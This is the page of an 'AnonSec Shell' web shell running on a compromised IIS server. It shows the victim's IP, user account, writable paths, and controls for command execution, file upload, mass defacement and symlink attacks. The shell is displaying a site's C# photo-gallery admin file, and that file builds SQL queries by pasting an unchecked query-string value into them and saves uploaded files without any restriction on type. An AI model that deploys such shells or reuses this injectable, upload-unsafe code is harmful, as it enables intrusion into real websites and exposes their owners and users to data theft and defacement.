AnonSec Shell
Server IP : 199.79.62.161  /  Your IP : 216.73.216.245   [ Reverse IP ]
Web Server : Microsoft-IIS/10.0
System : Windows NT MDUS-PP-WB12 10.0 build 20348 (Windows Server 2022) AMD64
User : IWPD_5096(nirmaowd) ( 0)
PHP Version : 8.3.30
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  D:/INETPUB/VHOSTS/nirmalamatha.edu.in/ponnuguruvayurappan.org/Admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : D:/INETPUB/VHOSTS/nirmalamatha.edu.in/ponnuguruvayurappan.org/Admin/edit_photogallery.aspx.cs
using System;
using System.Data;
using System.Data.SqlClient;
using System.Configuration;
using System.Web;

public partial class admin_edit_photogallery : System.Web.UI.Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        if (!IsPostBack)
        {
            if (Request.QueryString["pgid"] == "" || Request.QueryString["pgid"] == null)
                Response.Redirect("message.aspx?msg=Please try later!");
            else
            {
                LoadDetails(Request.QueryString["pgid"]);
            }
        }
    }

    public void LoadDetails(string PGID)
    {
        SqlConnection dbConn = new SqlConnection(ConfigurationManager.ConnectionStrings["myconnectionstring"].ConnectionString);
        SqlDataAdapter dbAdapt = new SqlDataAdapter("SELECT  * FROM [PHOTOGALLERY] WHERE PGID = " + PGID + "", dbConn);
        dbAdapt.MissingSchemaAction = MissingSchemaAction.AddWithKey;
        SqlCommandBuilder dbCB = new SqlCommandBuilder(dbAdapt);
        dbConn.Open();
        DataSet dbSet = new DataSet();
        dbAdapt.Fill(dbSet, "temp");
        DataTable dbTable = dbSet.Tables["temp"];

        // checking data exits
        if (dbTable.Rows.Count == 1)
        {

            DDL_PGGroup.DataBind();

            try
            {
                DDL_PGGroup.Items[DDL_PGGroup.Items.IndexOf(DDL_PGGroup.Items.FindByValue(dbTable.Rows[0]["GID"].ToString()))].Selected = true;
            }
            catch (Exception ex)
            { }

            txt_DisplayOrder.Text = dbTable.Rows[0]["Display"].ToString();
            HD_File.Value = dbTable.Rows[0]["Filename"].ToString();
        }
        else
        {
            Response.Redirect("message.aspx?msg=No Data Found");
        }
    }

    protected void btnUpload_Click(object sender, EventArgs e)
    {
        try
        {

            string pgid = Request.QueryString["pgid"];
            //********* add to db
            SqlConnection dbConn = new SqlConnection(ConfigurationManager.ConnectionStrings["myconnectionstring"].ConnectionString);
            SqlDataAdapter dbAdapt = new SqlDataAdapter("SELECT  * FROM [PHOTOGALLERY] WHERE PGID = " + pgid + "", dbConn);

            // We need this to get an ID back from the database
            dbAdapt.MissingSchemaAction = MissingSchemaAction.AddWithKey;

            // Create and initialize CommandBuilder
            SqlCommandBuilder dbCB = new SqlCommandBuilder(dbAdapt);
            // Open Connection
            dbConn.Open();

            // New DataSet
            DataSet dbSet = new DataSet();

            // Populate DataSet with data
            dbAdapt.Fill(dbSet, "temp");

            // Get reference to our table
            DataTable dbTable = dbSet.Tables["temp"];

            // checking data exits
            if (dbTable.Rows.Count == 1)
            {
                DataRow dbRow = dbTable.Rows[0];

                //********* file save

                dbRow["GID"] = int.Parse(DDL_PGGroup.SelectedValue);
                dbRow["Display"] = int.Parse(txt_DisplayOrder.Text);

                string filePath = "";
                string savePath = Server.MapPath("/assets/uploads/");
                string fileName = "";

                Random r = new Random();
                int rno = r.Next(10000, 99999);


                if (FU_Attachments.HasFile)
                {
                    fileName = "ponnuguruvayurappan-" + rno + "-" + System.Text.RegularExpressions.Regex.Replace(FU_Attachments.FileName, @"\s+", "-");
                    filePath = savePath + fileName;

                    if (filePath != "")
                    {
                        FU_Attachments.SaveAs(filePath);

                        if (fileName != "")
                            dbRow["Filename"] = fileName;
                        else
                            dbRow["Filename"] = null;

                    }
                }
                else
                {
                    dbRow["Filename"] = HD_File.Value;

                }


                int stat = dbAdapt.Update(dbSet, "temp");
                dbConn.Close();
                //********* end of save to db

                if (stat > 0)
                    Response.Redirect("add_photogallery.aspx?msg= Successfully Updated#msg");
                else
                    Response.Redirect("add_photogallery.aspx?msg= Please Try Later#msg");

            }

        }
        catch (Exception info)
        {
            throw info;
        }
    }
}

Anon7 - 2022
AnonSec Team